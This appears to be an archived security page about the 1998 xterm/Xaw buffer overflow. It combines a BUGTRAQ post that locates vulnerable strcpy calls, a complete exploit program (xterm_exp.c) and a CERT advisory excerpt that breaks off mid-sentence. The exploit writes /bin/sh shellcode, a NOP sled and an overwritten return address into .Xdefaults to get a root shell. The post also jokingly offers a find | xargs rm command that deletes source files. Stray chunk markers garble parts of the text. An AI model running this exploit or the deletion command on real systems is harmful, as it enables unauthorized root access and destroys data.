fgets(buff,16384,f_in);
      for (s=buff;isblank(*s);s++);
      if (strncmp(s,"xterm*inputMethod",17)<0)
        fputs(buff,f_out);

Date: Mon, 4 May 1998 11:06:05 +0200
From: Pavel Kankovsky <peak@kerberos.troja.mff.cuni.cz>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: TOG and xterm problem

On Fri, 1 May 1998, Jeff Gehlbach wrote:

> Open Group, when *will* the rest of us see at least some clues about where
> the bug lies and how it can be fixed?  You say you won't release patches
> to X11R<6.4, but can you at least be nice enough to tell those of us using
> the still-perfectly-serviceable 6.3 just a tidbit about the problem?

Believe or not, it took me 10 minutes to grep the appropriate parts of
X11R6.3 sources, following the clues mentioned in the CERT advisory, and
find the bugs--at least some of them.

xc/programs/xterm/charproc.c:
* HandleKeymapChange():

    (void) sprintf( mapName, "%sKeymap", params[0] );
    (void) strcpy( mapClass, mapName );

(actually, the second command is mostly harmless because the size of
mapName and mapClass is the same)

xc/programs/xterm/charproc.c:
* VTInitI18N():

        strcpy(tmp, term->misc.input_method);
...
            strcpy(buf, "@im=");
            strcat(buf, s);
...
    strcpy(tmp, term->misc.preedit_type);

xc/lib/Xaw/XawIm.c:
* OpenIM():

            strcpy(modifiers, "@im=");
            strcat(modifiers, ve->im.im_list[i]);

* ParseIMNameList():

    char        *s, *save_s, *ss, *list[32], **lp, *end;
...
        list[i] = s;

(This one is quite interesting.
Exercise for the reader: write an exploit.)

<ironic>
Security hint of the 
ffb
day:
        find . -name '*.[ch]' | \
        xargs egrep -l 'sprintf|strcat|strcpy' | \
        xargs rm
</ironic>


--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]


P.S. A copy of this message is being submitted to XFree86.




/*
 
  xterm_exp.c : linux/x86 xterm.Xaw exploit
  by alcuin - 5/4/98 - [ http://www.rootshell.com/ ]

  It works against both Xaw and neXtaw widgets

  NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to
  use xterm again.
        
*/

#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>


unsigned int getsp() {
  asm("mov %esp,%eax");
}

inline rootshell(){
  __asm__(
      "movb $0x56, %al\n\t"
      "l1:cmpb $0x12, %al\n\t"
      "je l2\n\t"
      "movb $0x12,%al\n\t"
      "call l1\n\t"
      "l2:pop %esi\n\t"
      "xorl %eax,%eax\n\t"
      "movb $0x25, %al\n\t"
      "addl %eax,%esi\n\t"
      "movl %esi,%ebx\n\t"
      "movl %esi,%edi\n\t"
      "movb $8,%al\n\t"
      "addl %eax,%edi\n\t"
      "movb $5,%al\n\t"
      "addl %eax,%esi\n\t" 
      "movl %esi,(%edi)\n\t"
      "movl %edi,%ecx\n\t"
      "incl %edi\n\t"
      "incl %edi\n\t"
      "incl %edi\n\t"
      "incl %edi\n\t"
      "xorb %al,%al\n\t"
      "movl %eax,(%edi)\n\t"
      "movl %edi,%edx\n\t"
      "movb $0xb,%al\n\t"
      "int $0x80\n\t"
      ".string \"/bin/sh\"\n"
      );
}

  
#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"

main (int argc, char **argv) {

  char *home;
  FILE *f_in, *f_out;
  char buf[16384];
  char shellbuf[16384];
  char *s;
  int i;
  unsigned int sp=getsp();

  if (home = getenv("HOME")) chdir(home);

  if (!(f_out = fopen(NEWFILE, "w"))) {
    perror("fopen");
    exit(1);
  }

  if (f_in = fopen(CONFFILE, "r")) {
    fseek(f_in,0,SEEK_SET);
    while (!feof(f_in)) {
      fgets(buf,16384,f_in);
      for (s=buf;isblank(*s);s++);
      if (strncmp(s,"xterm*inputMethod",17)<0)
        fputs(buf,f_out);
    }
    fclose(f_in);
  }

  /* fill the buffer with nops */
  memset(shellbuf, 0x90, sizeof(shellbuf));
  shellbuf[sizeof(shellbuf)-1] = 0;

  /* write the return adress */
  s = shellbuf+2052;
  *(int *)s=sp+0x69F5;
  
  /* write the root shell code */
  s = shellbuf+2800;
  strcpy(s,(char*)rootshell);

  fputs("xterm*inputMethod:",f_out);
  fputs(shellbuf, f_out);
  fclose(f_out);

  system("/bin/cp "CONFFILE" "OLDFILE);
  system("/bin/mv -f "NEWFILE" "CONFFILE);

  execl("/usr/X11R6/bin/xterm","xterm",NULL);
}

[ From CERT advisory VB-98.04 ]

I. Description

Vulnerabilities exist in the terminal emulator xterm(1), and the Xaw
library distributed in various MIT X Consortium; X Consortium, Inc.;
and The Open Group X Project Team releases. These vulnerabilities may
be exploited by an intruder to gain root access. 

The resources and the releases affected by the xterm vulnerability are:

                              Resources
                 inputMethod       preeditType      *Keymap
    Release      
    X11R3           NO                 NO             YES
    X11R4           NO                 NO             YES
    X11R5           NO                 NO             YES
    X11R6           NO                 NO             YES
    X11R6.1         YES                YES            YES
    X11R6.2         YES                YES            YES
    X11R6.3         YES                YES            YES
    X11R6.4         YES                YES            YES

The resources and the releases affected by the Xaw library
vulnerability are

                              Resources
                 inputMethod       preeditType
    Release      
    X11R6           YES                YES
    X11R6.1         YES                YES
    X11R6.2         YES                YES
    X11R6.3         YES                YES
    X11R6.4         YES                YES


(X11R6.2 was not released to the public.)

The Open Group X Project Team has investigated the issue and recommends 
the following steps for neutralizing the exposure. It is HIGHLY RECOMMENDED
that these measures be im
58c
plemented on ALL vulnerable systems. This issue 
will be corrected in future X Project Team releases of X11.